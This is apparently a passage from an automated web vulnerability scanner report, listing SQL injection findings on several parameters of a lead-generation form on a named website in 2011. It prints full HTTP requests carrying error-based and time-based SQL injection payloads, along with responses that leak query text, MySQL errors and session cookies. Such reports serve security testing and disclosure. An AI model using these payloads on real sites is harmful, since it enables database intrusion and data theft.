select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'months (Start-up)&attributeId_434=2821__No - Clean Credit&attributeId_435=2824__' at line 5

1.33. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_432%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_432%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_432%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion'&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'months (Start-up)&attributeId_434=2821__No - Clean Credit&attributeId_435=2824__' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion''&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.34. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_433 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_433 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_433 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Credit&attributeId_435=2824__$0 revenue - start-up&attributeId_436=2832__ $10,00' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)''&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.35. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_433 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_433 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_433 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:22:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Credit&attributeId_435=2824__$0 revenue - start-up&attributeId_436=2832__ $10,00' at line 5

1.36. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_434 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_434 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_434 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit'&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:22:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'revenue - start-up&attributeId_436=2832__ $10,000 - 49,999&attributeId_437=2840_' at line 5

1.37. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_434 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_434 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_434 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit'&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'revenue - start-up&attributeId_436=2832__ $10,000 - 49,999&attributeId_437=2840_' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit''&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


